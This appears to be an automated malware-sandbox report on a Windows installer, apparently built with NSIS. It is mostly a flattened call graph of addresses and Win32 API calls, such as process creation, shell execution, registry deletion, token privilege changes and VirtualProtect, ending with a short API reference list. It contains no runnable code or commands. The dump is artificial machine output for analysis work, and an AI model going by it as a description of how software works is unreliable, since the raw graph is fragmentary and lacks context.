5208 402c37 17 API calls 5207->5208 5209 401993 lstrlenW 5208->5209 5210 4019a4 5209->5210 5214 4019e5 5210->5214 5215 406282 lstrcpynW 
5210->5215 5212 4019d5 5213 4019da lstrlenW 5212->5213 5212->5214 5213->5214 5215->5212 5216 100018a9 5217 100018cc 5216->5217 5218 10001911 5217->5218 5219 100018ff GlobalFree 5217->5219 5220 10001272 2 API calls 5218->5220 5219->5218 5221 10001a87 GlobalFree GlobalFree 5220->5221 5222 4027e9 5223 4027f0 5222->5223 5225 402a6a 5222->5225 5224 402c15 17 API calls 5223->5224 5226 4027f7 5224->5226 5227 402806 SetFilePointer 5226->5227 5227->5225 5228 402816 5227->5228 5230 4061c9 wsprintfW 5228->5230 5230->5225 5231 40166a 5232 402c37 17 API calls 5231->5232 5233 401670 5232->5233 5234 4065c5 2 API calls 5233->5234 5235 401676 5234->5235 5236 401ced 5237 402c15 17 API calls 5236->5237 5238 401cf3 IsWindow 5237->5238 5239 401a20 5238->5239 4512 40176f 4513 402c37 17 API calls 4512->4513 4514 401776 4513->4514 4515 401796 4514->4515 4516 40179e 4514->4516 4552 406282 lstrcpynW 4515->4552 4553 406282 lstrcpynW 4516->4553 4519 40179c 4522 406516 5 API calls 4519->4522 4520 4017a9 4521 405b53 3 API calls 4520->4521 4523 4017af lstrcatW 4521->4523 4540 4017bb 4522->4540 4523->4519 4524 4065c5 2 API calls 4524->4540 4525 4017f7 4526 405d4f 2 API calls 4525->4526 4526->4540 4528 4017cd CompareFileTime 4528->4540 4529 40188d 4530 4052e6 24 API calls 4529->4530 4532 401897 4530->4532 4531 401864 4533 4052e6 24 API calls 4531->4533 4550 401879 4531->4550 4535 4030fa 31 API calls 4532->4535 4533->4550 4534 406282 lstrcpynW 4534->4540 4536 4018aa 4535->4536 4537 4018be SetFileTime 4536->4537 4539 4018d0 CloseHandle 4536->4539 4537->4539 4538 4062a4 17 API calls 4538->4540 4541 4018e1 4539->4541 4539->4550 4540->4524 4540->4525 4540->4528 4540->4529 4540->4531 4540->4534 4540->4538 4551 405d74 GetFileAttributesW CreateFileW 4540->4551 4554 4058e4 4540->4554 4542 4018e6 4541->4542 4543 4018f9 4541->4543 4544 4062a4 17 API calls 4542->4544 4545 4062a4 17 API calls 4543->4545 4547 4018ee lstrcatW 4544->4547 4548 401901 4545->4548 4547->4548 4549 4058e4 MessageBoxIndirectW 4548->4549 
4549->4550 4551->4540 4552->4519 4553->4520 4555 4058f9 4554->4555 4556 405945 4555->4556 4557 40590d MessageBoxIndirectW 4555->4557 4556->4540 4557->4556 5240 402570 5241 402c37 17 API calls 5240->5241 5242 402577 5241->5242 5245 405d74 GetFileAttributesW CreateFileW 5242->5245 5244 402583 5245->5244 4558 401b71 4559 401bc2 4558->4559 4560 401b7e 4558->4560 4561 401bc7 4559->4561 4562 401bec GlobalAlloc 4559->4562 4563 401c07 4560->4563 4568 401b95 4560->4568 4572 4022f1 4561->4572 4579 406282 lstrcpynW 4561->4579 4564 4062a4 17 API calls 4562->4564 4565 4062a4 17 API calls 4563->4565 4563->4572 4564->4563 4567 4022eb 4565->4567 4571 4058e4 MessageBoxIndirectW 4567->4571 4577 406282 lstrcpynW 4568->4577 4569 401bd9 GlobalFree 4569->4572 4571->4572 4573 401ba4 4578 406282 lstrcpynW 4573->4578 4575 401bb3 4580 406282 lstrcpynW 4575->4580 4577->4573 4578->4575 4579->4569 4580->4572 5246 401a72 5247 402c15 17 API calls 5246->5247 5248 401a78 5247->5248 5249 402c15 17 API calls 5248->5249 5250 401a20 5249->5250 5251 4024f2 5252 402c77 17 API calls 5251->5252 5253 4024fc 5252->5253 5254 402c15 17 API calls 5253->5254 5255 402505 5254->5255 5256 402521 RegEnumKeyW 5255->5256 5257 40252d RegEnumValueW 5255->5257 5259 402885 5255->5259 5258 402542 RegCloseKey 5256->5258 5257->5258 5258->5259 4581 403373 SetErrorMode GetVersion 4582 4033b2 4581->4582 4583 4033b8 4581->4583 4584 40665c 5 API calls 4582->4584 4585 4065ec 3 API calls 4583->4585 4584->4583 4586 4033ce lstrlenA 4585->4586 4586->4583 4587 4033de 4586->4587 4588 40665c 5 API calls 4587->4588 4589 4033e5 4588->4589 4590 40665c 5 API calls 4589->4590 4591 4033ec 4590->4591 4592 40665c 5 API calls 4591->4592 4593 4033f8 #17 OleInitialize SHGetFileInfoW 4592->4593 4672 406282 lstrcpynW 4593->4672 4596 403444 GetCommandLineW 4673 406282 lstrcpynW 4596->4673 4598 403456 GetModuleHandleW 4599 40346e 4598->4599 4600 405b80 CharNextW 4599->4600 4601 40347d CharNextW 4600->4601 4602 4035a7 GetTempPathW 4601->4602 4610 
403496 4601->4610 4674 403342 4602->4674 4604 4035bf 4605 4035c3 GetWindowsDirectoryW lstrcatW 4604->4605 4606 403619 DeleteFileW 4604->4606 4607 403342 12 API calls 4605->4607 4684 402ec1 GetTickCount GetModuleFileNameW 4606->4684 4611 4035df 4607->4611 4608 405b80 CharNextW 4608->4610 4610->4608 4616 403592 4610->4616 4618 403590 4610->4618 4611->4606 4613 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4611->4613 4612 40362d 4614 4036e0 4612->4614 4619 4036d0 4612->4619 4624 405b80 CharNextW 4612->4624 4617 403342 12 API calls 4613->4617 4771 4038b6 4614->4771 4768 406282 lstrcpynW 4616->4768 4622 403611 4617->4622 4618->4602 4712 403990 4619->4712 4622->4606 4622->4614 4636 40364c 4624->4636 4625 40381a 4628 403822 GetCurrentProcess OpenProcessToken 4625->4628 4629 40389e ExitProcess 4625->4629 4626 4036fa 4627 4058e4 MessageBoxIndirectW 4626->4627 4633 403708 ExitProcess 4627->4633 4634 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4628->4634 4635 40386e 4628->4635 4631 403710 4638 40584f 5 API calls 4631->4638 4632 4036aa 4637 405c5b 18 API calls 4632->4637 4634->4635 4639 40665c 5 API calls 4635->4639 4636->4631 4636->4632 4640 4036b6 4637->4640 4641 403715 lstrcatW 4638->4641 4642 403875 4639->4642 4640->4614 4769 406282 lstrcpynW 4640->4769 4643 403731 lstrcatW lstrcmpiW 4641->4643 4644 403726 lstrcatW 4641->4644 4645 40388a ExitWindowsEx 4642->4645 4646 403897 4642->4646 4643->4614 4648 40374d 4643->4648 4644->4643 4645->4629 4645->4646 4780 40140b 4646->4780 4651 403752 4648->4651 4652 403759 4648->4652 4650 4036c5 4770 406282 lstrcpynW 4650->4770 4655 4057b5 4 API calls 4651->4655 4653 405832 2 API calls 4652->4653 4657 40375e SetCurrentDirectoryW 4653->4657 4656 403757 4655->4656 4656->4657 4658 403779 4657->4658 4659 40376e 4657->4659 4779 406282 lstrcpynW 4658->4779 4778 406282 lstrcpynW 4659->4778 4662 4062a4 17 API calls 4663 4037b8 DeleteFileW 4662->4663 4664 4037c5 CopyFileW 4663->4664 4669 403787 4663->4669 
4664->4669 4665 40380e 4666 406048 36 API calls 4665->4666 4666->4614 4667 406048 36 API calls 4667->4669 4668 4062a4 17 API calls 4668->4669 4669->4662 4669->4665 4669->4667 4669->4668 4670 405867 2 API calls 4669->4670 4671 4037f9 CloseHandle 4669->4671 4670->4669 4671->4669 4672->4596 4673->4598 4675 406516 5 API calls 4674->4675 4676 40334e 4675->4676 4677 403358 4676->4677 4678 405b53 3 API calls 4676->4678 4677->4604 4679 403360 4678->4679 4680 405832 2 API calls 4679->4680 4681 403366 4680->4681 4682 405da3 2 API calls 4681->4682 4683 403371 4682->4683 4683->4604 4783 405d74 GetFileAttributesW CreateFileW 4684->4783 4686 402f01 4705 402f11 4686->4705 4784 406282 lstrcpynW 4686->4784 4688 402f27 4689 405b9f 2 API calls 4688->4689 4690 402f2d 4689->4690 4785 406282 lstrcpynW 4690->4785 4692 402f38 GetFileSize 4693 403034 4692->4693 4711 402f4f 4692->4711 4786 402e5d 4693->4786 4695 40303d 4697 40306d GlobalAlloc 4695->4697 4695->4705 4798 40332b SetFilePointer 4695->4798 4696 403315 ReadFile 4696->4711 4797 40332b SetFilePointer 4697->4797 4700 4030a0 4702 402e5d 6 API calls 4700->4702 4701 403088 4704 4030fa 31 API calls 4701->4704 4702->4705 4703 403056 4706 403315 ReadFile 4703->4706 4709 403094 4704->4709 4705->4612 4708 403061 4706->4708 4707 402e5d 6 API calls 4707->4711 4708->4697 4708->4705 4709->4705 4709->4709 4710 4030d1 SetFilePointer 4709->4710 4710->4705 4711->4693 4711->4696 4711->4700 4711->4705 4711->4707 4713 40665c 5 API calls 4712->4713 4714 4039a4 4713->4714 4715 4039aa 4714->4715 4716 4039bc 4714->4716 4807 4061c9 wsprintfW 4715->4807 4717 406150 3 API calls 4716->4717 4718 4039ec 4717->4718 4720 403a0b lstrcatW 4718->4720 4722 406150 3 API calls 4718->4722 4721 4039ba 4720->4721 4799 403c66 4721->4799 4722->4720 4725 405c5b 18 API calls 4726 403a3d 4725->4726 4727 403ad1 4726->4727 4729 406150 3 API calls 4726->4729 4728 405c5b 18 API calls 4727->4728 4730 403ad7 4728->4730 4731 403a6f 4729->4731 4732 403ae7 LoadImageW 4730->4732 4733 
4062a4 17 API calls 4730->4733 4731->4727 4736 403a90 lstrlenW 4731->4736 4740 405b80 CharNextW 4731->4740 4734 403b8d 4732->4734 4735 403b0e RegisterClassW 4732->4735 4733->4732 4739 40140b 2 API calls 4734->4739 4737 403b44 SystemParametersInfoW CreateWindowExW 4735->4737 4738 403b97 4735->4738 4741 403ac4 4736->4741 4742 403a9e lstrcmpiW 4736->4742 4737->4734 4738->4614 4743 403b93 4739->4743 4744 403a8d 4740->4744 4746 405b53 3 API calls 4741->4746 4742->4741 4745 403aae GetFileAttributesW 4742->4745 4743->4738 4749 403c66 18 API calls 4743->4749 4744->4736 4748 403aba 4745->4748 4747 403aca 4746->4747 4808 406282 lstrcpynW 4747->4808 4748->4741 4752 405b9f 2 API calls 4748->4752 4750 403ba4 4749->4750 4753 403bb0 ShowWindow 4750->4753 4754 403c33 4750->4754 4752->4741 4755 4065ec 3 API calls 4753->4755 4756 4053b9 5 API calls 4754->4756 4760 403bc8 4755->4760 4757 403c39 4756->4757 4758 403c55 4757->4758 4761 403c3d 4757->4761 4762 40140b 2 API calls 4758->4762 4759 403bd6 GetClassInfoW 4764 403c00 DialogBoxParamW 4759->4764 4765 403bea GetClassInfoW RegisterClassW 4759->4765 4760->4759 4763 4065ec 3 API calls 4760->4763 4761->4738 4766 40140b 2 API calls 4761->4766 4762->4738 4763->4759 4767 40140b 2 API calls 4764->4767 4765->4764 4766->4738 4767->4738 4768->4618 4769->4650 4770->4619 4772 4038c0 CloseHandle 4771->4772 4773 4038ce 4771->4773 4772->4773 4813 4038fb 4773->4813 4776 405990 67 API calls 4777 4036e9 OleUninitialize 4776->4777 4777->4625 4777->4626 4778->4658 4779->4669 4781 401389 2 API calls 4780->4781 4782 401420 4781->4782 4782->4629 4783->4686 4784->4688 4785->4692 4787 402e66 4786->4787 4788 402e7e 4786->4788 4789 402e76 4787->4789 4790 402e6f DestroyWindow 4787->4790 4791 402e86 4788->4791 4792 402e8e GetTickCount 4788->4792 4789->4695 4790->4789 4793 406698 2 API calls 4791->4793 4794 402e9c CreateDialogParamW ShowWindow 4792->4794 4795 402ebf 4792->4795 4796 402e8c 4793->4796 4794->4795 4795->4695 4796->4695 4797->4701 4798->4703 4800 
403c7a 4799->4800 4809 4061c9 wsprintfW 4800->4809 4802 403ceb 4810 403d1f 4802->4810 4804 403a1b 4804->4725 4805 403cf0 4805->4804 4806 4062a4 17 API calls 4805->4806 4806->4805 4807->4721 4808->4727 4809->4802 4811 4062a4 17 API calls 4810->4811 4812 403d2d SetWindowTextW 4811->4812 4812->4805 4814 403909 4813->4814 4815 40390e FreeLibrary GlobalFree 4814->4815 4816 4038d3 4814->4816 4815->4815 4815->4816 4816->4776 4817 401573 4818 401583 ShowWindow 4817->4818 4819 40158c 4817->4819 4818->4819 4820 40159a ShowWindow 4819->4820 4821 402abf 4819->4821 4820->4821 5261 4014f5 SetForegroundWindow 5262 402abf 5261->5262 5263 100016b6 5264 100016e5 5263->5264 5265 10001b18 22 API calls 5264->5265 5266 100016ec 5265->5266 5267 100016f3 5266->5267 5268 100016ff 5266->5268 5271 10001272 2 API calls 5267->5271 5269 10001726 5268->5269 5270 10001709 5268->5270 5273 10001750 5269->5273 5274 1000172c 5269->5274 5272 1000153d 3 API calls 5270->5272 5275 100016fd 5271->5275 5276 1000170e 5272->5276 5278 1000153d 3 API calls 5273->5278 5277 100015b4 3 API calls 5274->5277 5279 100015b4 3 API calls 5276->5279 5280 10001731 5277->5280 5278->5275 5281 10001714 5279->5281 5282 10001272 2 API calls 5280->5282 5283 10001272 2 API calls 5281->5283 5284 10001737 GlobalFree 5282->5284 5285 1000171a GlobalFree 5283->5285 5284->5275 5286 1000174b GlobalFree 5284->5286 5285->5275 5286->5275 5287 401e77 5288 402c37 17 API calls 5287->5288 5289 401e7d 5288->5289 5290 402c37 17 API calls 5289->5290 5291 401e86 5290->5291 5292 402c37 17 API calls 5291->5292 5293 401e8f 5292->5293 5294 402c37 17 API calls 5293->5294 5295 401e98 5294->5295 5296 401423 24 API calls 5295->5296 5297 401e9f 5296->5297 5304 4058aa ShellExecuteExW 5297->5304 5299 401ee1 5300 40670d 5 API calls 5299->5300 5302 402885 5299->5302 5301 401efb CloseHandle 5300->5301 5301->5302 5304->5299 5305 10002238 5306 10002296 5305->5306 5307 100022cc 5305->5307 5306->5307 5308 100022a8 GlobalAlloc 5306->5308 5308->5306 4829 40167b 
4830 402c37 17 API calls 4829->4830 4831 401682 4830->4831 4832 402c37 17 API calls 4831->4832 4833 40168b 4832->4833 4834 402c37 17 API calls 4833->4834 4835 401694 MoveFileW 4834->4835 4836 4016a0 4835->4836 4837 4016a7 4835->4837 4838 401423 24 API calls 4836->4838 4839 4065c5 2 API calls 4837->4839 4841 40224a 4837->4841 4838->4841 4840 4016b6 4839->4840 4840->4841 4842 406048 36 API calls 4840->4842 4842->4836 5309 1000103d 5310 1000101b 5 API calls 5309->5310 5311 10001056 5310->5311 4843 4020fe 4844 402c37 17 API calls 4843->4844 4845 402105 4844->4845 4846 402c37 17 API calls 4845->4846 4847 40210f 4846->4847 4848 402c37 17 API calls 4847->4848 4849 402119 4848->4849 4850 402c37 17 API calls 4849->4850 4851 402123 4850->4851 4852 402c37 17 API calls 4851->4852 4853 40212d 4852->4853 4854 40216c CoCreateInstance 4853->4854 4855 402c37 17 API calls 4853->4855 4858 40218b 4854->4858 4855->4854 4856 401423 24 API calls 4857 40224a 4856->4857 4858->4856 4858->4857 4859 40247e 4860 402c77 17 API calls 4859->4860 4861 402488 4860->4861 4862 402c37 17 API calls 4861->4862 4863 402491 4862->4863 4864 40249c RegQueryValueExW 4863->4864 4867 402885 4863->4867 4865 4024c2 RegCloseKey 4864->4865 4866 4024bc 4864->4866 4865->4867 4866->4865 4870 4061c9 wsprintfW 4866->4870 4870->4865 5312 4019ff 5313 402c37 17 API calls 5312->5313 5314 401a06 5313->5314 5315 402c37 17 API calls 5314->5315 5316 401a0f 5315->5316 5317 401a16 lstrcmpiW 5316->5317 5318 401a28 lstrcmpW 5316->5318 5319 401a1c 5317->5319 5318->5319 3806 401f00 3821 402c37 3806->3821 3815 401f2b 3817 401f30 3815->3817 3818 401f3b 3815->3818 3816 402885 3846 4061c9 wsprintfW 3817->3846 3820 401f39 CloseHandle 3818->3820 3820->3816 3822 402c43 3821->3822 3847 4062a4 3822->3847 3825 401f06 3827 4052e6 3825->3827 3828 405301 3827->3828 3836 401f10 3827->3836 3829 40531d lstrlenW 3828->3829 3832 4062a4 17 API calls 3828->3832 3830 405346 3829->3830 3831 40532b lstrlenW 3829->3831 3834 405359 3830->3834 3835 40534c 
SetWindowTextW 3830->3835 3833 40533d lstrcatW 3831->3833 3831->3836 3832->3829 3833->3830 3834->3836 3837 40535f SendMessageW SendMessageW SendMessageW 3834->3837 3835->3834 3838 405867 CreateProcessW 3836->3838 3837->3836 3839 401f16 3838->3839 3840 40589a CloseHandle 3838->3840 3839->3816 3839->3820 3841 40670d WaitForSingleObject 3839->3841 3840->3839 3842 406727 3841->3842 3843 406739 GetExitCodeProcess 3842->3843 3889 406698 3842->3889 3843->3815 3846->3820 3848 4062b1 3847->3848 3849 4064fc 3848->3849 3852 4064ca lstrlenW 3848->3852 3855 4062a4 10 API calls 3848->3855 3857 4063df GetSystemDirectoryW 3848->3857 3858 4063f2 GetWindowsDirectoryW 3848->3858 3859 406516 5 API calls 3848->3859 3860 406426 SHGetSpecialFolderLocation 3848->3860 3861 4062a4 10 API calls 3848->3861 3862 40646d lstrcatW 3848->3862 3873 406150 3848->3873 3878 4061c9 wsprintfW 3848->3878 3879 406282 lstrcpynW 3848->3879 3850 402c64 3849->3850 3880 406282 lstrcpynW 3849->3880 3850->3825 3864 406516 3850->3864 3852->3848 3855->3852 3857->3848 3858->3848 3859->3848 3860->3848 3863 40643e SHGetPathFromIDListW CoTaskMemFree 3860->3863 3861->3848 3862->3848 3863->3848 3871 406523 3864->3871 3865 406599 3866 40659e CharPrevW 3865->3866 3868 4065bf 3865->3868 3866->3865 3867 40658c CharNextW 3867->3865 3867->3871 3868->3825 3870 406578 CharNextW 3870->3871 3871->3865 3871->3867 3871->3870 3872 406587 CharNextW 3871->3872 3885 405b80 3871->3885 3872->3867 3881 4060ef 3873->3881 3876 406184 RegQueryValueExW RegCloseKey 3877 4061b4 3876->3877 3877->3848 3878->3848 3879->3848 3880->3850 3882 4060fe 3881->3882 3883 406102 3882->3883 3884 406107 RegOpenKeyExW 3882->3884 3883->3876 3883->3877 3884->3883 3886 405b86 3885->3886 3887 405b9c 3886->3887 3888 405b8d CharNextW 3886->3888 3887->3871 3888->3886 3890 4066b5 PeekMessageW 3889->3890 3891 4066c5 WaitForSingleObject 3890->3891 3892 4066ab DispatchMessageW 3890->3892 3891->3842 3892->3890 5320 401000 5321 401037 BeginPaint GetClientRect 5320->5321 
5322 40100c DefWindowProcW 5320->5322 5324 4010f3 5321->5324 5327 401179 5322->5327 5325 401073 CreateBrushIndirect FillRect DeleteObject 5324->5325 5326 4010fc 5324->5326 5325->5324 5328 401102 CreateFontIndirectW 5326->5328 5329 401167 EndPaint 5326->5329 5328->5329 5330 401112 6 API calls 5328->5330 5329->5327 5330->5329 4067 100027c2 4068 10002812 4067->4068 4069 100027d2 VirtualProtect 4067->4069 4069->4068 5331 401503 5332 40150b 5331->5332 5334 40151e 5331->5334 5333 402c15 17 API calls 5332->5333 5333->5334 4081 402306 4082 40230e 4081->4082 4085 402314 4081->4085 4083 402c37 17 API calls 4082->4083 4083->4085 4084 402322 4087 402330 4084->4087 4088 402c37 17 API calls 4084->4088 4085->4084 4086 402c37 17 API calls 4085->4086 4086->4084 4089 402c37 17 API calls 4087->4089 4088->4087 4090 402339 WritePrivateProfileStringW 4089->4090 5335 401f86 5336 402c37 17 API calls 5335->5336 5337 401f8d 5336->5337 5338 40665c 5 API calls 5337->5338 5339 401f9c 5338->5339 5340 401fb8 GlobalAlloc 5339->5340 5341 402020 5339->5341 5340->5341 5342 401fcc 5340->5342 5343 40665c 5 API calls 5342->5343 5344 401fd3 5343->5344 5345 40665c 5 API calls 5344->5345 5346 401fdd 5345->5346 5346->5341 5350 4061c9 wsprintfW 5346->5350 5348 402012 5351 4061c9 wsprintfW 5348->5351 5350->5348 5351->5341 4098 402388 4099 402390 4098->4099 4100 4023bb 4098->4100 4110 402c77 4099->4110 4102 402c37 17 API calls 4100->4102 4104 4023c2 4102->4104 4115 402cf5 4104->4115 4105 4023a1 4107 402c37 17 API calls 4105->4107 4108 4023a8 RegDeleteValueW RegCloseKey 4107->4108 4109 4023cf 4108->4109 4111 402c37 17 API calls 4110->4111 4112 402c8e 4111->4112 4113 4060ef RegOpenKeyExW 4112->4113 4114 402397 4113->4114 4114->4105 4114->4109 4116 402d0b 4115->4116 4117 402d21 4116->4117 4119 402d2a 4116->4119 4117->4109 4120 4060ef RegOpenKeyExW 4119->4120 4121 402d58 4120->4121 4122 402dd0 4121->4122 4129 402d5c 4121->4129 4122->4117 4123 402d7e RegEnumKeyW 4124 402d95 RegCloseKey 4123->4124 4123->4129 4126 
40665c 5 API calls 4124->4126 4125 402db6 RegCloseKey 4125->4122 4128 402da5 4126->4128 4127 402d2a 6 API calls 4127->4129 4130 402dc4 RegDeleteKeyW 4128->4130 4131 402da9 4128->4131 4129->4123 4129->4124 4129->4125 4129->4127 4130->4122 4131->4122 5352 40190c 5353 401943 5352->5353 5354 402c37 17 API calls 5353->5354 5355 401948 5354->5355 5356 405990 67 API calls 5355->5356 5357 401951 5356->5357 5358 401d0e 5359 402c15 17 API calls 5358->5359 5360 401d15 5359->5360 5361 402c15 17 API calls 5360->5361 5362 401d21 GetDlgItem 5361->5362 5363 40258c 5362->5363 5364 1000164f 5365 10001516 GlobalFree 5364->5365 5367 10001667 5365->5367 5366 100016ad GlobalFree 5367->5366 5368 10001682 5367->5368 5369 10001699 VirtualFree 5367->5369 5368->5366 5369->5366 5370 40190f 5371 402c37 17 API calls 5370->5371 5372 401916 5371->5372 5373 4058e4 MessageBoxIndirectW 5372->5373 5374 40191f 5373->5374 5375 401491 5376 4052e6 24 API calls 5375->5376 5377 401498 5376->5377 5378 402592 5379 4025c1 5378->5379 5380 4025a6 5378->5380 5382 4025f5 5379->5382 5383 4025c6 5379->5383 5381 402c15 17 API calls 5380->5381 5388 4025ad 5381->5388 5384 402c37 17 API calls 5382->5384 5385 402c37 17 API calls 5383->5385 5386 4025fc lstrlenW 5384->5386 5387 4025cd WideCharToMultiByte lstrlenA 5385->5387 5386->5388 5387->5388 5390 405e55 5 API calls 5388->5390 5391 40263f 5388->5391 5392 402629 5388->5392 5389 405e26 WriteFile 5389->5391 5390->5392 5392->5389 5392->5391 5393 10001058 5395 10001074 5393->5395 5394 100010dd 5395->5394 5396 10001516 GlobalFree 5395->5396 5397 10001092 5395->5397 5396->5397 5398 10001516 GlobalFree 5397->5398 5399 100010a2 5398->5399 5400 100010b2 5399->5400 5401 100010a9 GlobalSize 5399->5401 5402 100010b6 GlobalAlloc 5400->5402 5403 100010c7 5400->5403 5401->5400 5404 1000153d 3 API calls 5402->5404 5405 100010d2 GlobalFree 5403->5405 5404->5403 5405->5394 4155 401c19 4156 402c15 17 API calls 4155->4156 4157 401c20 4156->4157 4158 402c15 17 API calls 4157->4158 4159 
401c2d 4158->4159 4160 401c42 4159->4160 4161 402c37 17 API calls 4159->4161 4162 401c52 4160->4162 4165 402c37 17 API calls 4160->4165 4161->4160 4163 401ca9 4162->4163 4164 401c5d 4162->4164 4167 402c37 17 API calls 4163->4167 4166 402c15 17 API calls 4164->4166 4165->4162 4168 401c62 4166->4168 4169 401cae 4167->4169 4170 402c15 17 API calls 4168->4170 4171 402c37 17 API calls 4169->4171 4172 401c6e 4170->4172 4173 401cb7 FindWindowExW 4171->4173 4174 401c99 SendMessageW 4172->4174 4175 401c7b SendMessageTimeoutW 4172->4175 4176 401cd9 4173->4176 4174->4176 4175->4176 5406 402a9a SendMessageW 5407 402ab4 InvalidateRect 5406->5407 5408 402abf 5406->5408 5407->5408 5409 40281b 5410 402821 5409->5410 5411 402829 FindClose 5410->5411 5412 402abf 5410->5412 5411->5412 5413 40149e 5414 4022f1 5413->5414 5415 4014ac PostQuitMessage 5413->5415 5415->5414 5416 40469f 5417 4046d5 5416->5417 5418 4046af 5416->5418 5420 40427e 8 API calls 5417->5420 5419 404217 18 API calls 5418->5419 5421 4046bc SetDlgItemTextW 5419->5421 5422 4046e1 5420->5422 5421->5417 5423 100010e1 5424 10001111 5423->5424 5425 100011d8 GlobalFree 5424->5425 5426 100012ba 2 API calls 5424->5426 5427 100011d3 5424->5427 5428 10001272 2 API calls 5424->5428 5429 10001164 GlobalAlloc 5424->5429 5430 100011f8 GlobalFree 5424->5430 5431 100012e1 lstrcpyW 5424->5431 5432 100011c4 GlobalFree 5424->5432 5426->5424 5427->5425 5428->5432 5429->5424 5430->5424 5431->5424 5432->5424 5433 4015a3 5434 402c37 17 API calls 5433->5434 5435 4015aa SetFileAttributesW 5434->5435 5436 4015bc 5435->5436 4246 405425 4247 405446 GetDlgItem GetDlgItem GetDlgItem 4246->4247 4248 4055cf 4246->4248 4292 40424c SendMessageW 4247->4292 4250 405600 4248->4250 4251 4055d8 GetDlgItem CreateThread CloseHandle 4248->4251 4252 40562b 4250->4252 4253 405650 4250->4253 4254 405617 ShowWindow ShowWindow 4250->4254 4251->4250 4315 4053b9 OleInitialize 4251->4315 4255 405637 4252->4255 4262 40568b 4252->4262 4301 40427e 4253->4301 4297 40424c 
SendMessageW 4254->4297 4258 405665 ShowWindow 4255->4258 4259 40563f 4255->4259 4256 4054b6 4261 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 4256->4261 4266 405685 4258->4266 4267 405677 4258->4267 4298 4041f0 4259->4298 4268 40552b 4261->4268 4269 40550f SendMessageW SendMessageW 4261->4269 4262->4253 4263 405699 SendMessageW 4262->4263 4265 40565e 4263->4265 4270 4056b2 CreatePopupMenu 4263->4270 4274 4041f0 SendMessageW 4266->4274 4273 4052e6 24 API calls 4267->4273 4271 405530 SendMessageW 4268->4271 4272 40553e 4268->4272 4269->4268 4275 4062a4 17 API calls 4270->4275 4271->4272 4293 404217 4272->4293 4273->4266 4274->4262 4277 4056c2 AppendMenuW 4275->4277 4279 4056f2 TrackPopupMenu 4277->4279 4280 4056df GetWindowRect 4277->4280 4278 40554e 4281 405557 ShowWindow 4278->4281 4282 40558b GetDlgItem SendMessageW 4278->4282 4279->4265 4283 40570d 4279->4283 4280->4279 4284 40556d ShowWindow 4281->4284 4287 40557a 4281->4287 4282->4265 4285 4055b2 SendMessageW SendMessageW 4282->4285 4286 405729 SendMessageW 4283->4286 4284->4287 4285->4265 4286->4286 4288 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4286->4288 4296 40424c SendMessageW 4287->4296 4290 40576b SendMessageW 4288->4290 4290->4290 4291 405794 GlobalUnlock SetClipboardData CloseClipboard 4290->4291 4291->4265 4292->4256 4294 4062a4 17 API calls 4293->4294 4295 404222 SetDlgItemTextW 4294->4295 4295->4278 4296->4282 4297->4252 4299 4041f7 4298->4299 4300 4041fd SendMessageW 4298->4300 4299->4300 4300->4253 4302 404296 GetWindowLongW 4301->4302 4303 40431f 4301->4303 4302->4303 4304 4042a7 4302->4304 4303->4265 4305 4042b6 GetSysColor 4304->4305 4306 4042b9 4304->4306 4305->4306 4307 4042c9 SetBkMode 4306->4307 4308 4042bf SetTextColor 4306->4308 4309 4042e1 GetSysColor 4307->4309 4310 4042e7 4307->4310 4308->4307 4309->4310 4311 4042f8 4310->4311 4312 4042ee SetBkColor 4310->4312 4311->4303 4313 404312 CreateBrushIndirect 4311->4313 4314 40430b DeleteObject 4311->4314 
4312->4311 4313->4303 4314->4313 4322 404263 4315->4322 4317 4053dc 4321 405403 4317->4321 4325 401389 4317->4325 4318 404263 SendMessageW 4319 405415 OleUninitialize 4318->4319 4321->4318 4323 40427b 4322->4323 4324 40426c SendMessageW 4322->4324 4323->4317 4324->4323 4327 401390 4325->4327 4326 4013fe 4326->4317 4327->4326 4328 4013cb MulDiv SendMessageW 4327->4328 4328->4327 5437 4028a7 5438 402c37 17 API calls 5437->5438 5439 4028b5 5438->5439 5440 4028cb 5439->5440 5441 402c37 17 API calls 5439->5441 5442 405d4f 2 API calls 5440->5442 5441->5440 5443 4028d1 5442->5443 5465 405d74 GetFileAttributesW CreateFileW 5443->5465 5445 4028de 5446 402981 5445->5446 5447 4028ea GlobalAlloc 5445->5447 5450 402989 DeleteFileW 5446->5450 5451 40299c 5446->5451 5448 402903 5447->5448 5449 402978 CloseHandle 5447->5449 5466 40332b SetFilePointer 5448->5466 5449->5446 5450->5451 5453 402909 5454 403315 ReadFile 5453->5454 5455 402912 GlobalAlloc 5454->5455 5456 402922 5455->5456 5457 402956 5455->5457 5459 4030fa 31 API calls 5456->5459 5458 405e26 WriteFile 5457->5458 5460 402962 GlobalFree 5458->5460 5464 40292f 5459->5464 5461 4030fa 31 API calls 5460->5461 5463 402975 5461->5463 5462 40294d GlobalFree 5462->5457 5463->5449 5464->5462 5465->5445 5466->5453 4329 4058aa ShellExecuteExW 5467 40432b lstrcpynW lstrlenW 4330 40202c 4331 40203e 4330->4331 4341 4020f0 4330->4341 4332 402c37 17 API calls 4331->4332 4334 402045 4332->4334 4333 401423 24 API calls 4337 40224a 4333->4337 4335 402c37 17 API calls 4334->4335 4336 40204e 4335->4336 4338 402064 LoadLibraryExW 4336->4338 4339 402056 GetModuleHandleW 4336->4339 4340 402075 4338->4340 4338->4341 4339->4338 4339->4340 4353 4066cb WideCharToMultiByte 4340->4353 4341->4333 4344 402086 4347 4020a5 4344->4347 4348 40208e 4344->4348 4345 4020bf 4346 4052e6 24 API calls 4345->4346 4349 402096 4346->4349 4356 10001759 4347->4356 4350 401423 24 API calls 4348->4350 4349->4337 4351 4020e2 FreeLibrary 4349->4351 4350->4349 4351->4337 

                                                                                                                                Control-flow Graph (graph image not captured; first block 403373-4033b0)
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE ref: 00403396
                                                                                                                                • GetVersion.KERNEL32 ref: 0040339C
                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403413
                                                                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
